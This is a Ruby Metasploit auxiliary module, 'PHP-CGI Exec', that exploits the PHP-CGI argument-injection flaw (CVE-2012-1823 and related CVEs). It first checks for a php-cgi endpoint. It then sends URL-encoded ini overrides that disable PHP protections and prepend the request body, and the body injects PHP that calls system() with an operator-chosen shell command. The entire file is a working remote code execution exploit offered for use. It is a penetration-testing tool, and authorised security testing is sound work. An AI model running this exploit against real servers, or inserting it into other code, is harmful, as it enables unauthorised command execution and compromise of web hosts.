#
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name'           => 'PHP-CGI Exec',
      'Description'    => %q{This module attempts to execute an OS command on the targets via PHPCGI.
      },
      'Author'         =>
        [
          'Joshua D. Abraham <josh.abraham[at]praetorian.com>'
        ],
      'License'        => MSF_LICENSE,
      'References'      =>
        [
          [ 'CVE', '2012-1823'],
          [ 'CVE', '2012-2311'],
          [ 'CVE', '2012-2335'],
          [ 'CVE', '2012-2336'],
          [ 'OSVDB', '81633'],
          [ 'OSVDB', '82213']
        ],
    )
    register_options(
      [ OptInt.new('RPORT', [ true, "The target port", 80]),
        OptBool.new('SSL', [ true,  "Use SSL", false ]),
        OptString.new('CMD', [ true, "The command to execute.",'id']),
        OptString.new('TARGETURI', [ true, "The URL of the php-cgi interface.",'/cgi-bin/php5']),
    ], self.class)
  end

  def get_schema
    if datastore['SSL']
      return 'https'
    else
      return 'http'
    end
  end

  def target_url
    get_schema() + "://#{vhost.to_s}:#{rport.to_s}/#{datastore['TARGETURI'].to_s}"
  end

  def run_host(ip)
    print_status("Verifying the phpcgi interface exists at #{target_url}")
    uri = datastore['TARGETURI']
    begin
      response = send_request_cgi({ 'uri' => uri } )
      unless response
        vprint_error("#{ip} seems to be down")
        return
      end

    rescue
      print_error("The page does not exist at #{target_url}")
      return
    end

    begin
      print_status("#{rhost}:#{rport} - Sending request...")
      phpdata = "<?php echo '\n\n'; system('" + datastore['CMD'] + "'); die; ?>"
      phpcmd = '-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n'
      phpcmd.gsub!(' ','+')
      phpcmd.gsub!('=','%3d')
      phpcmd.gsub!('/','%2f')
      phpcmd.gsub!('.','%2e')
      phpcmd.gsub!('"','%22')
      phpcmd.gsub!('-','%2d')
      phpcmd.gsub!(':','%3a')
      res = send_request_cgi({
        'uri'          => "#{uri}?#{phpcmd}",
        'method'       => 'POST',
        'data'         => phpdata,
      }, 5)

      if res and res.body and res.code == 200 and res.body
        cmd_output = res.body
        print_good("#{target_url} - phpcgi - #{cmd_output}")
      else
        vprint_error("#{target_url} - phpcgi - Failed to execute commands")
        return :abort
      end

      rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      rescue ::Timeout::Error, ::Errno::EPIPE
    end
  end
end
